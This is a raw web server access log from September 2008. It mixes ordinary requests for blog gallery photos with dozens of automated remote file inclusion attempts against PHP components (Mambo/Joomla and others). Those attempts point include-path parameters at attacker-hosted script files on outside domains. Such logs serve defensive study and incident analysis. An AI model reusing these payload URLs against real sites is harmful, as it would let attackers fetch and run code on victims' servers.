88.191.76.130 - - [20/Sep/2008:10:50:51 -0700] "GET /logs/access_080527.log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:50:54 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:51:03 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-102_1.jpg HTTP/1.1" 200 389138 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:51:06 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 200 92681 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:51:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_0.jpg HTTP/1.1" 200 362527 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:51:32 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:10:51:32 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:51:44 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [20/Sep/2008:10:51:44 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:51:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-084_1.jpg HTTP/1.1" 200 312631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:52:00 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 200 421697 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:52:04 -0700] "GET /logs/access_080824.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:52:06 -0700] "GET /logs/access_080905.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.41.162 - - [20/Sep/2008:10:52:26 -0700] "GET /logs/access_080826.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:52:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0011.jpg HTTP/1.1" 200 578661 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:52:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-043_2.jpg HTTP/1.1" 200 443411 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:52:48 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:52:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92401 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:52:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-052_0.jpg HTTP/1.1" 200 404497 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:53:02 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:53:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-277.jpg HTTP/1.1" 200 390300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:53:26 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-052_1.jpg HTTP/1.1" 200 476439 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:53:33 -0700] "GET /logs/access_080209.log//index.php?lang=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:53:35 -0700] "GET //index.php?lang=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 200 92256 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:53:36 -0700] "GET /logs//index.php?lang=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:53:40 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-176_0.jpg HTTP/1.1" 200 253958 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:53:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-244.jpg HTTP/1.1" 200 244888 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
67.18.151.242 - - [20/Sep/2008:10:53:59 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 200 92711 "-" "libwww-perl/5.810" "www.dmulk.com"
88.255.189.240 - - [20/Sep/2008:10:54:11 -0700] "GET /logs/access_071228.log/tools/send_reminders.php?noSet=0&includedir=http://www.citoyennete-active.org/mambots/content/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:54:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-127.jpg HTTP/1.1" 200 647576 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:54:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-205.jpg HTTP/1.1" 200 338524 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:54:48 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-076_0.jpg HTTP/1.1" 200 330756 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:54:53 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:54:56 -0700] "GET //index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 92385 "-" "libwww-perl/5.79" "www.dmulk.com"
190.210.9.213 - - [20/Sep/2008:10:55:10 -0700] "GET //errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:55:12 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:55:12 -0700] "GET /errors.php?error=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:55:13 -0700] "GET /logs/errors.php?error=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:55:14 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:55:15 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079_1.jpg HTTP/1.1" 200 430789 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:55:18 -0700] "GET /logs/access_080824.log/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:55:19 -0700] "GET /logs/access_080905.log/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.169.98 - - [20/Sep/2008:10:55:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.kupc.org/zero/bbs//skin/zero_vote/ooid.txt???? HTTP/1.1" 200 92440 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:55:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-272.jpg HTTP/1.1" 200 367746 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:55:43 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-026_0.jpg HTTP/1.1" 200 250543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
88.84.156.46 - - [20/Sep/2008:10:55:52 -0700] "GET /logs/access_080527.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:55:57 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-096_0.jpg HTTP/1.1" 200 323897 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:56:11 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-155.jpg HTTP/1.1" 200 372924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:56:25 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003_3.jpg HTTP/1.1" 200 293654 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:56:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-268.jpg HTTP/1.1" 200 445988 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:56:54 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-088_0.jpg HTTP/1.1" 200 351133 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
217.20.138.101 - - [20/Sep/2008:10:57:03 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [20/Sep/2008:10:57:03 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://prestodoor.com/public_html/alb_id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:57:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-021_1.jpg HTTP/1.1" 200 410647 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
216.104.33.42 - - [20/Sep/2008:10:57:17 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:10:57:18 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:10:57:18 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:10:57:18 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:57:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-252.jpg HTTP/1.1" 200 368208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:57:28 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:57:37 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-011_1.jpg HTTP/1.1" 200 551551 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:57:48 -0700] "GET /logs/access_080824.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.96.204 - - [20/Sep/2008:10:57:48 -0700] "GET /logs/access_080905.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:57:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-160_0.jpg HTTP/1.1" 200 539450 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:58:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-130.jpg HTTP/1.1" 200 383009 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:58:12 -0700] "GET /logs/access_080419.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:58:12 -0700] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:58:12 -0700] "GET /logs/access_080405.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:58:12 -0700] "GET /logs/access_080703.log/errors.php?error=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:10:58:13 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92481 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:58:16 -0700] "GET /errors.php?error=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:10:58:16 -0700] "GET /logs/errors.php?error=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:58:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-023_2.jpg HTTP/1.1" 200 480065 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
209.216.249.151 - - [20/Sep/2008:10:58:25 -0700] "GET /logs/access_080830.log/index.php?color=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [20/Sep/2008:10:58:27 -0700] "GET /index.php?color=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 200 92280 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [20/Sep/2008:10:58:27 -0700] "GET /logs/index.php?color=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:58:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-085_1.jpg HTTP/1.1" 200 426751 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.17.6.7 - - [20/Sep/2008:10:58:33 -0700] "GET /logs/access_080830.log/index.php?page=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [20/Sep/2008:10:58:35 -0700] "GET /index.php?page=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 200 92275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [20/Sep/2008:10:58:38 -0700] "GET /logs/index.php?page=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.44.182 - - [20/Sep/2008:10:58:39 -0700] "GET /logs/access_080527.log/?mosConfig_absolute_path=http://www.asa-auto.ba/mambo/cache/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:58:46 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-016_1.jpg HTTP/1.1" 200 507860 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:58:47 -0700] "GET /logs/!scanhttp://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:58:47 -0700] "GET /!scanhttp://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:58:47 -0700] "GET /logs/access_080228.log/!scanhttp://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [20/Sep/2008:10:58:47 -0700] "GET /logs/access_080211.log/!scanhttp://ebooks.siteburg.com/id3.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:58:59 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-129_0.jpg HTTP/1.1" 200 474378 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
43.244.132.32 - - [20/Sep/2008:10:59:09 -0700] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.velvet-wb.de//mambots/content/jpopup/script/sistem.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:59:13 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-046_0.jpg HTTP/1.1" 200 506535 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:59:27 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-022_0.jpg HTTP/1.1" 200 383692 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
193.136.63.5 - - [20/Sep/2008:10:59:33 -0700] "GET /logs/access_070724.log//index.php?lang=http://beherit.interfree.it/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:59:41 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-154.jpg HTTP/1.1" 200 389048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.117.3.211 - - [20/Sep/2008:10:59:45 -0700] "GET /logs/access_080427.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.117.3.211 - - [20/Sep/2008:10:59:45 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.160.79.6 - - [20/Sep/2008:10:59:51 -0700] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:10:59:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-005_1.jpg HTTP/1.1" 200 597269 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.117.3.211 - - [20/Sep/2008:10:59:56 -0700] "GET /logs/access_080427.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.117.3.211 - - [20/Sep/2008:10:59:56 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.117.3.211 - - [20/Sep/2008:10:59:57 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.117.3.211 - - [20/Sep/2008:10:59:59 -0700] "GET /logs/access_080412.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
82.192.81.54 - - [20/Sep/2008:11:00:07 -0700] "GET /logs/access_080712.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.192.81.54 - - [20/Sep/2008:11:00:07 -0700] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.192.81.54 - - [20/Sep/2008:11:00:08 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92465 "-" "libwww-perl/5.813" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:11:00:09 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-069.jpg HTTP/1.1" 200 431589 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
66.117.3.211 - - [20/Sep/2008:11:00:16 -0700] "GET /logs/access_080412.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.donhogar.com/media/trono/stroet/.../.../osy.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.192.81.54 - - [20/Sep/2008:11:00:18 -0700] "GET /logs/access_080828.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:11:00:23 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0018.jpg HTTP/1.1" 200 320247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:11:00:36 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-089_0.jpg HTTP/1.1" 200 326432 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
85.17.6.7 - - [20/Sep/2008:11:00:48 -0700] "GET /logs/access_080831.log/index.php?page=http://www.besosmimosycaricias.com/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:11:00:51 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-005_0.jpg HTTP/1.1" 200 419132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
